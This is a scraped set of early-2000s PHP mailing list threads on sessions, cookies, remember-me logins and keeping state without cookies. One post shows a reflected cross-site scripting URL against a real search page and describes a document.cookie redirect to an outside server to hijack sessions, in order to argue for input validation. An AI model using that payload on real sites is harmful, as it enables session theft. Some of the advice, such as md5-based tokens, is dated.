Thanks heaps John, So as a basic rule, having a uid and pwd stored as session variables is NOT the problem, but storing the uid and/or pwd in a cookie on the browser is just plain asking for it :) So, how do you implement a remember me safely? Setting JUST the uid in a cookie prevents people from knowing the pwd, but I have to validate the user before granting access to pages... without a pwd, it seems, e, impossible :) Justin Just search google for Cross Site Scripting and you'll find a ton of articles about that specifically. It all comes down to validating user input and not displaying it directly back to the screen. Here is a link, for example, that'll pop up your cookies for cnn.com. (watch the wrapping!) http://cnn.looksmart.com/r_search?lizchqc=col=cnniqm=0st=1nh=10rf =1venue=allkeyword=qp=search=0key=%3Cscript%3Ealert%28%27Hi%27%29%3 B%3C%2Fscript%3E Now, how about instead of just executing alert(Hi), I do a location.href='www.myserver.com?var='+document.cookie; and send myself your cookie. Then I just simply make my cookie match yours, and poof, I'm you. :) It all comes down to validating user input and never showing it directly back to the browser/screen. Similar problems exist for variables you use in database queries... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
So as a basic rule, having a uid and pwd stored as session variables is NOT the problem, but storing the uid and/or pwd in a cookie on the browser is just plain asking for it :) You shouldn't even have to do this. Just set a $_SESSION['logged_on'] variable to true and check for that. Why carry around the username and password?? So, how do you implement a remember me safely? You don't, if you have anything to protect. If it's just for a forum or convenience and might just cause a little headache is someone's user is hijacked, then you can do it with a cookie. Setting JUST the uid in a cookie prevents people from knowing the pwd, but I have to validate the user before granting access to pages... without a pwd, it seems, e, impossible :) Why do people insist on it being something related to the username and password. Just use uniqid() and md5() to create a unique id for the use, save it in their table, and use that in the cookie. If you base it off of something, it makes it easier to crack... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
on 17/07/02 12:35 PM, John Holmes ([EMAIL PROTECTED]) wrote: You shouldn't even have to do this. Just set a $_SESSION['logged_on'] variable to true and check for that. Why carry around the username and password?? Well, I guess it's because I started with someone else's script, and built my own from there. Not being a security expert, I assumed that they did this for a reason. Are you saying that setting $_SESSION['logged_on'] after I've validated their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ? Interesting stuff... So the real problem with sessions is hijacking the session ID, not fake $_SESSION vars. I guess I need to look into session hijacking next. So, how do you implement a remember me safely? You don't, if you have anything to protect. If it's just for a forum or convenience and might just cause a little headache is someone's user is hijacked, then you can do it with a cookie. What about if the cookie was set under https / SSL Why do people insist on it being something related to the username and password. Just use uniqid() and md5() to create a unique id for the use, save it in their table, and use that in the cookie. If you base it off of something, it makes it easier to crack... Good point. Thanks for your advice. Justin French -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
You shouldn't even have to do this. Just set a $_SESSION['logged_on'] variable to true and check for that. Why carry around the username and password?? Well, I guess it's because I started with someone else's script, and built my own from there. Not being a security expert, I assumed that they did this for a reason. Are you saying that setting $_SESSION['logged_on'] after I've validated their login (once) is just as safe as $_SESSION['uid'], $_SESSION['pwd'] ? Sure, why not? Users can't create session variables (unless you're on a virtual server...) Interesting stuff... So the real problem with sessions is hijacking the session ID, not fake $_SESSION vars. Correct. The good thing with sessions is that they only last for as long as the browser is open. So you can't come back and hijack a user. You'd have to do it at the same time that the user is online. I guess I need to look into session hijacking next. So, how do you implement a remember me safely? You don't, if you have anything to protect. If it's just for a forum or convenience and might just cause a little headache is someone's user is hijacked, then you can do it with a cookie. What about if the cookie was set under https / SSL It makes it secure from sniffing... I don't think it would help for a cross site scripting vulnerability, though... ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions / logins / cookies / security
on 17/07/02 1:05 PM, John Holmes ([EMAIL PROTECTED]) wrote: Sure, why not? Users can't create session variables (unless you're on a virtual server...) ... and I am -- A shared host server that is. Justin French -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions / logins / cookies / security
I came across the same problem a few week ago, and thought (didn't do it though) that the best way to handle this kind of security, would be to make an ID/cookie for the user/session which deletes itself after the browser is closed, but not storing the password. Then, if that same user wants to open a new session in other computer at the same time, I would have a *REPLICATION* script which looks up that user and tells him that he already has an open session and that should type the password again (like Hotmail does). Makes sense? C. -Original Message- From: 1LT John W. Holmes [mailto:[EMAIL PROTECTED]] Sent: Tuesday, July 16, 2002 4:51 PM To: Chad Day; [EMAIL PROTECTED] Subject: Re: [PHP] Sessions / logins / cookies / security There really isn't a good way to do this, I think. Any time you're taking just a cookie, and using that data to assume who the user is, it's open to hijacking. I can sniff the cookie or maybe find a cross-site scripting bug to steal it, create the same cookie on my machine, and poof, i'm that user. Now, if it's just for a forum, or something simple, then just do it. It's not worth worrying about someone hijacking my forum user. Anyway, the best way to create the unique id is to use uniqid() in combo with md5(). That'll give you a 32 character string that's hard to predict and isn't based on any of the user data. www.php.net/uniqid ---John Holmes... - Original Message - From: Chad Day [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, July 16, 2002 3:30 PM Subject: RE: [PHP] Sessions / logins / cookies / security Anyone? Can someone at least point me to some web article for recommendations? I saw some examples where a password variable was stored, but is that really safe (as long as I MD5 it first?) Chad -Original Message- From: Chad Day [mailto:[EMAIL PROTECTED]] Sent: Tuesday, July 16, 2002 12:30 PM To: [EMAIL PROTECTED] Subject: [PHP] Sessions / logins / cookies / security I asked something similar a little while ago, but didn't do a good job clarifying. What I'm looking to do is when a user logs in, I start up the session.. I then have the registered session var to verify they are authenticated as they move throughout the site. Now, when they close the browser and come back, I want them to still be authenticated. Obviously, I have to set a cookie. But what do I set? Do I set just their user ID? The MD5 of their password? What's the most secure way, that's not easily spoofed? I don't know that much about cookies, but if I just use a user ID, couldn't someone just change that ID value and 'become' another user? Thanks for any advice, Chad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
maintain state accross requests. This is done in 3 different ways. 1. Cookies 2. URL Mangling 3. HTTP Authentication #4 Passing a SID/Session info in hidden fields, but it means you must push every page move through a submit (which can be done with Javascript, image buttons, etc), depending on what you are trying to do it might be alright... -GED -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions Without Cookies or SID Passing...
We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions Without Cookies or SID Passing...
Use standard HTTP authentication over SSL - that's the only other way. On Tue, 14 May 2002, Matthew Walker wrote: We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions Without Cookies or SID Passing...
On Tue, 14 May 2002, Matthew Walker wrote: Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. I don't entirely understand. If your site is not dynamic, then what do you need sessions for? miguel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
The sites are not dynamic, but the shopping cart /is/. The problem is, if people don't have cookies on, when they return to the site to order more products, they loose the SID that has been appended to the links inside the cart, and thus loose the contents of their shopping cart. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Miguel Cruz [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:48 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] Sessions Without Cookies or SID Passing... On Tue, 14 May 2002, Matthew Walker wrote: Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. I don't entirely understand. If your site is not dynamic, then what do you need sessions for? miguel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
You're not understanding the problem. This is not an authentication situation. We are using sessions to track information about what a customer's OrderID is, and other related information. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:42 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: Re: [PHP] Sessions Without Cookies or SID Passing... Use standard HTTP authentication over SSL - that's the only other way. On Tue, 14 May 2002, Matthew Walker wrote: We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
I am understanding the problem perfectly. HTTP is stateless. You want to maintain state accross requests. This is done in 3 different ways. 1. Cookies 2. URL Mangling 3. HTTP Authentication You said you did not want to do 1 or 2. That only leaves you with HTTP Authentication. HTTP Authentication is really just like a cookie that can't be disabled when it comes down to it. -Rasmus On Tue, 14 May 2002, Matthew Walker wrote: You're not understanding the problem. This is not an authentication situation. We are using sessions to track information about what a customer's OrderID is, and other related information. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:42 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: Re: [PHP] Sessions Without Cookies or SID Passing... Use standard HTTP authentication over SSL - that's the only other way. On Tue, 14 May 2002, Matthew Walker wrote: We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
On Tue, 14 May 2002, Matthew Walker wrote: The sites are not dynamic, but the shopping cart /is/. The problem is, if people don't have cookies on, when they return to the site to order more products, they loose the SID that has been appended to the links inside the cart, and thus loose the contents of their shopping cart. I think you are running into facts of life here. You can only keep track of people using a limited set of mechanisms (which Rasmus has listed). Perhaps with cunning design you could use frames and JavaScript to handle this but it's outside the scope of PHP. miguel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
You're missing one method - using the user's IP address It's not a guaranteed fool-proof method, but if you don't want to use cookies or the URL, then this sorta works. -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Wednesday, May 15, 2002 10:04 AM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... I am understanding the problem perfectly. HTTP is stateless. You want to maintain state accross requests. This is done in 3 different ways. 1. Cookies 2. URL Mangling 3. HTTP Authentication You said you did not want to do 1 or 2. That only leaves you with HTTP Authentication. HTTP Authentication is really just like a cookie that can't be disabled when it comes down to it. -Rasmus On Tue, 14 May 2002, Matthew Walker wrote: You're not understanding the problem. This is not an authentication situation. We are using sessions to track information about what a customer's OrderID is, and other related information. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:42 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: Re: [PHP] Sessions Without Cookies or SID Passing... Use standard HTTP authentication over SSL - that's the only other way. On Tue, 14 May 2002, Matthew Walker wrote: We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
Could you explain how this could be accomplished, because I'm not understanding how to do it. As I understand HTTP Authentication (correct me if I'm wrong), the user's computer still has to send a 'username/password' pair to perform the authentication. I can't see how this could be used to maintain session data. But maybe my mind is just trapped in a rut. Please enlighten me. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 6:04 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... I am understanding the problem perfectly. HTTP is stateless. You want to maintain state accross requests. This is done in 3 different ways. 1. Cookies 2. URL Mangling 3. HTTP Authentication You said you did not want to do 1 or 2. That only leaves you with HTTP Authentication. HTTP Authentication is really just like a cookie that can't be disabled when it comes down to it. -Rasmus On Tue, 14 May 2002, Matthew Walker wrote: You're not understanding the problem. This is not an authentication situation. We are using sessions to track information about what a customer's OrderID is, and other related information. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:42 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: Re: [PHP] Sessions Without Cookies or SID Passing... Use standard HTTP authentication over SSL - that's the only other way. On Tue, 14 May 2002, Matthew Walker wrote: We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
No, it doesn't work at all. All sorts of people are behind proxies. Every AOL user, for example. All these people end up showing up as the same, or at least one of a pool of a few dozen ips. If you use this methods millions of users will end up sharing the same shopping cart. That's probably not a good idea. -Rasmus On Wed, 15 May 2002, Martin Towell wrote: You're missing one method - using the user's IP address It's not a guaranteed fool-proof method, but if you don't want to use cookies or the URL, then this sorta works. -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Wednesday, May 15, 2002 10:04 AM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... I am understanding the problem perfectly. HTTP is stateless. You want to maintain state accross requests. This is done in 3 different ways. 1. Cookies 2. URL Mangling 3. HTTP Authentication You said you did not want to do 1 or 2. That only leaves you with HTTP Authentication. HTTP Authentication is really just like a cookie that can't be disabled when it comes down to it. -Rasmus On Tue, 14 May 2002, Matthew Walker wrote: You're not understanding the problem. This is not an authentication situation. We are using sessions to track information about what a customer's OrderID is, and other related information. Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:42 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: Re: [PHP] Sessions Without Cookies or SID Passing... Use standard HTTP authentication over SSL - that's the only other way. On Tue, 14 May 2002, Matthew Walker wrote: We have a shopping cart product we're developing in PHP, and I've recently come across I dilemma that I need to find a reliable solution to. Many of the people who will be shopping on our sites have cookies disabled, which presents a problem when using sessions. Now, I am aware of the fact that we could append the SID constant to every URL, but this will not work for us. None of our sites are dynamic, and updating them is out of the question (We have over 100 sites). As well, someday we intend to sell this software, and we don't want to require that people make their sites fully dynamic to accommodate it. So, is there any reliable way to emulate sessions without requiring a cookie, or a variable passed in every URL? Matthew Walker Senior Software Engineer ePliant Marketing --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
Could you explain how this could be accomplished, because I'm not understanding how to do it. As I understand HTTP Authentication (correct me if I'm wrong), the user's computer still has to send a 'username/password' pair to perform the authentication. I can't see how this could be used to maintain session data. But maybe my mind is just trapped in a rut. Please enlighten me. The problem here is not where to store the session data. That's obvious. You store the session data on your server. The real problem is linking the session data (ie. the contents of a shopping cart) to a specific user so when that same user is surfing through your site, on every request you know which cart is his. And if he goes away and comes back later, you again can go find his cart and you know what is in it. Ergo, therefore, if you are able to uniquely identify the user you have solved your session problem. HTTP Authentication does this brilliantly. The only difference between cookies and http auth is that with a cookie you send the remote user a unique identifier that is then sent back to you whenever that specific user visits your site. Because this happens automatically and people don't like that, some people turn this off. With HTTP authentication, instead of doing this automatically you have the user create a profile on your site where part of this will include a unique identifier and a password. Each time the user visits your site this information will be sent exactly like a cookie. Depending on how users configure their browsers they may have to log in at the beginning of a session although these days most browsers have these password managers that make this login procedure trivial. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
If it ain't foolproof then only a fool would use it ... IP addresses are just about the worst way to identify anyone. -Original Message- From: Martin Towell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 8:17 PM To: 'Rasmus Lerdorf'; Matthew Walker Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... You're missing one method - using the user's IP address It's not a guaranteed fool-proof method, but if you don't want to use cookies or the URL, then this sorta works. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
Especially if they come through a gateway, or use internet connection sharing, you can't tell them apart using IP Addresses. Warren Vail Tools, Metrics Quality Processes (415) 667-7814 Pager (877) 774-9891 215 Fremont 02-658 -Original Message- From: Mark Charette [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 5:30 PM Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... If it ain't foolproof then only a fool would use it ... IP addresses are just about the worst way to identify anyone. -Original Message- From: Martin Towell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 8:17 PM To: 'Rasmus Lerdorf'; Matthew Walker Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... You're missing one method - using the user's IP address It's not a guaranteed fool-proof method, but if you don't want to use cookies or the URL, then this sorta works. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
Blah. That's a really ugly choice, but I suppose we may end up having to do that. I'd give my kingdom for always-on cookies. Ah well. I'll look into this some more once my current project is finished. Thanks for your advice. (And thanks to everyone else too) Matthew Walker Senior Software Engineer ePliant Marketing -Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]] Sent: Tuesday, May 14, 2002 6:26 PM To: Matthew Walker Cc: [EMAIL PROTECTED] Subject: RE: [PHP] Sessions Without Cookies or SID Passing... Could you explain how this could be accomplished, because I'm not understanding how to do it. As I understand HTTP Authentication (correct me if I'm wrong), the user's computer still has to send a 'username/password' pair to perform the authentication. I can't see how this could be used to maintain session data. But maybe my mind is just trapped in a rut. Please enlighten me. The problem here is not where to store the session data. That's obvious. You store the session data on your server. The real problem is linking the session data (ie. the contents of a shopping cart) to a specific user so when that same user is surfing through your site, on every request you know which cart is his. And if he goes away and comes back later, you again can go find his cart and you know what is in it. Ergo, therefore, if you are able to uniquely identify the user you have solved your session problem. HTTP Authentication does this brilliantly. The only difference between cookies and http auth is that with a cookie you send the remote user a unique identifier that is then sent back to you whenever that specific user visits your site. Because this happens automatically and people don't like that, some people turn this off. With HTTP authentication, instead of doing this automatically you have the user create a profile on your site where part of this will include a unique identifier and a password. Each time the user visits your site this information will be sent exactly like a cookie. Depending on how users configure their browsers they may have to log in at the beginning of a session although these days most browsers have these password managers that make this login procedure trivial. -Rasmus --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.351 / Virus Database: 197 - Release Date: 4/19/2002 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions Without Cookies or SID Passing...
You're missing one method - using the user's IP address It's not a guaranteed fool-proof method, but if you don't want to use cookies or the URL, then this sorta works. Unless there's a firewall using NAT or a proxy cache involved. I know for a fact that our internal network only ever reports the address of our firewall. We run an Internet kiosk of sorts so if two or three people hit your site from inside our firewall they will all look like the same person. We're not alone in doing this sort of thing. CYA, Dave -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] sessions, PHPSESSID, cookies
I have a website where I use sessions. After a user has logged of, the logon screen appears again. The username field is filled with the value from a cookie. What happens: For example: username = Peter In the situation that I log of (and the logon page appears), the username field gets the value from the cookie and the string ; PHPSESSID. (Peter; PHPSESSID) When I close the browser window and open a new browser window the value of the username is correct (Peter). The string ; PHPSESSID is not in the cookie. What is the reason that this string (the variable name for session id as set in my php.ini) appears in this field? In other words, why is the session_id variable name displayed in a field that is filled by a cookie. I also tried to end the session, but the only thing I can find is destroy_session and that only destroys everything that is within that session, but it does not kill the session itsselfs How do I solve this problem. Regards, Gilbert -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Sessions and Cookies on Macs
on 8/27/01 10:31 AM, Richard Baskett at [EMAIL PROTECTED] wrote: Ok on a pc when I have cookies turned off I am still able to access my session variables, but on a mac I can not. Is there a difference between the way session variables are stored on each platform? And if a session is indeed a cookie, then why does the session still work on pc's with cookies disabled? Rick check out http://www.php.net/manual/en/ref.session.php as a place to start. if cookies are turned off, the session is maintained in the url. have you figured out your mac session problem? i use a mac to develop my sites, and many of them use sessions without a problem. when i turn off cookies in the browser (usually the latest version of ie) php handles it smoothly. let me know if you have any questions, mike -- mike cullerton -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Sessions and Cookies on Macs
I just used the url to pass it since no matter what I did I couldn¹t seem to get it to work when cookies were turned off on my mac. I've read the session url on the php site from top to bottom and the transparent sessions are even enabled on the server, but yet to no avail on the mac :( on 8/27/01 10:31 AM, Richard Baskett at [EMAIL PROTECTED] wrote: Ok on a pc when I have cookies turned off I am still able to access my session variables, but on a mac I can not. Is there a difference between the way session variables are stored on each platform? And if a session is indeed a cookie, then why does the session still work on pc's with cookies disabled? Rick check out http://www.php.net/manual/en/ref.session.php as a place to start. if cookies are turned off, the session is maintained in the url. have you figured out your mac session problem? i use a mac to develop my sites, and many of them use sessions without a problem. when i turn off cookies in the browser (usually the latest version of ie) php handles it smoothly. let me know if you have any questions, mike -- mike cullerton -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
[PHP] Sessions and Cookies on Macs
Ok on a pc when I have cookies turned off I am still able to access my session variables, but on a mac I can not. Is there a difference between the way session variables are stored on each platform? And if a session is indeed a cookie, then why does the session still work on pc's with cookies disabled? Rick -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
RE: [PHP] Sessions vs Cookies?
I am about to write a new admin system for a website I do and
it will have many different logins. I was wondering overall which
most of you thought would be better for such a thing? Wants really
a pro about sessions over cookies?
If it's for an admin section, then you may as well use cookies. If
the client doesn't want to use cookies they can't use their admin
interface. :) I doubt they would have privacy issues with themselves
anyway.
If you're going to use cookies, hopefully you'll have a database
system available (you said you'd have lots of different logins).
So, create a session table:
ID int
username text
password text (if required, maybe you won't need it again)
logintime int
expirytime int
magickey text
Generate a magic key as such:
?
$randomseed = intval(ereg_replace([^0-9], ,
substr(Date(U).microtime(), 4, 10)));
srand($randomseed);
$newid = rand(1, 9);
$magickey = md5($newid.$REMOTE_ADDR.time());
?
This should give you sufficient entropy as to make the magickey unguessable
(except by sheer fluke). Send the magic key as the cookie and log it in the
table (sessiontime = session time in seconds):
INSERT INTO sessions
